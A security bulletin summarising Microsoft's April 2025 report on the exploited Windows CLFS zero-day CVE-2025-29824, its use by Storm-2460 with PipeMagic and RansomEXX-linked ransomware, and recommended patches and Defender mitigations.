Summary:
Microsoft has recently patched a zero-day vulnerability, identified as CVE-2025-29824, which impacts the Windows Common Log File System (CLFS) that was actively exploited in a small number of targeted ransomware attacks. These attacks, tracked under the threat cluster Storm-2460, primarily affected organizations in the IT and real estate sectors in the United States, the financial sector in Venezuela, a Spanish software company, and the retail sector in Saudi Arabia. Exploiting this privilege escalation flaw in CLFS allowed attackers to gain SYSTEM privileges.

The threat actors utilized a plugin-based trojan called PipeMagic, first observed in 2022 and delivered via a malicious MSBuild file, to deploy both the exploit and ransomware payloads. While the initial access vector remains unknown, the attackers were observed using the certutil utility to download malware from a compromised legitimate third-party site. Notably, this is the second Windows zero-day vulnerability delivered via PipeMagic, following CVE-2025-24983. PipeMagic has also been observed being used in Nokoyawa ransomware attacks that leveraged another CLFS zero-day, CVE-2023-28252. Successful exploitation of CVE-2025-29824 involves memory corruption and the utilization of the RtlSetAllBits API to elevate privileges and allow for process injection into SYSTEM processes, followed swiftly by credential extraction and file encryption. Although Microsoft could not obtain a ransomware sample, the ransom note contained a TOR domain linked to the RansomEXX ransomware family. Windows 11, version 24H2, is unaffected by this specific exploit.

Security Officer Comments:
The targeting of specific sectors across different geographical regions indicates a potentially sophisticated and targeted campaign. The connection to the RansomEXX ransomware family suggests that Storm-2460 has financially motivated objectives. The ineffectiveness of this particular exploit against the latest version of Windows (11 version 24H2) symbolizes the security benefits of keeping systems updated. Organizations should prioritize applying the Microsoft Patch Tuesday update to mitigate the risk associated with CVE-2025-29824 and remain vigilant for any suspicious activity indicative of PipeMagic or similar malware. The continued use of CLFS zero-days in ransomware attacks warrants further attention from defenders.

Suggested Corrections:
IOCs are available here.

Microsoft released security updates to address CVE 2025-29824 on April 8, 2025. Customers running Windows 11, version 24H2 are not affected by the observed exploitation, even if the vulnerability was present. Microsoft urges customers to apply these updates as soon as possible.

Microsoft recommends the following mitigations to reduce the impact of activity associated with Storm-2460:

• Refer to our blog Ransomware as a service: Understanding the cybercrime gig economy and how to protect yourself for robust measures to defend against ransomware.
• Turn on cloud-delivered protection in Microsoft Defender Antivirus or the equivalent for your antivirus product to cover rapidly evolving attacker tools and techniques. Cloud-based machine learning protections block a majority of new and unknown variants.
• Use device discovery to increase your visibility into your network by finding unmanaged devices on your network and onboarding them to Microsoft Defender for Endpoint. Ransomware attackers often identify unmanaged or legacy systems and use these blind spots to stage attacks.
• Run EDR in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus doesn't detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
• Enable investigation and remediation in full automated mode to allow Microsoft Defender for Endpoint to take immediate action on alerts to resolve breaches, significantly reducing alert volume. Use Microsoft Defender Vulnerability Management to assess your current status and deploy any updates that might have been missed.
• Microsoft 365 Defender customers can turn on attack surface reduction rules to prevent common attack techniques used in ransomware attacks:
• Use advanced protection against ransomware

Link(s):
https://www.microsoft.com/en-us/security/blog/2025/04/08/exploitation-of-clfs-zero-day-leads-to-ransomware-activity/

https://www.bleepingcomputer.com/news/security/microsoft-windows-clfs-zero-day-exploited-by-ransomware-gang/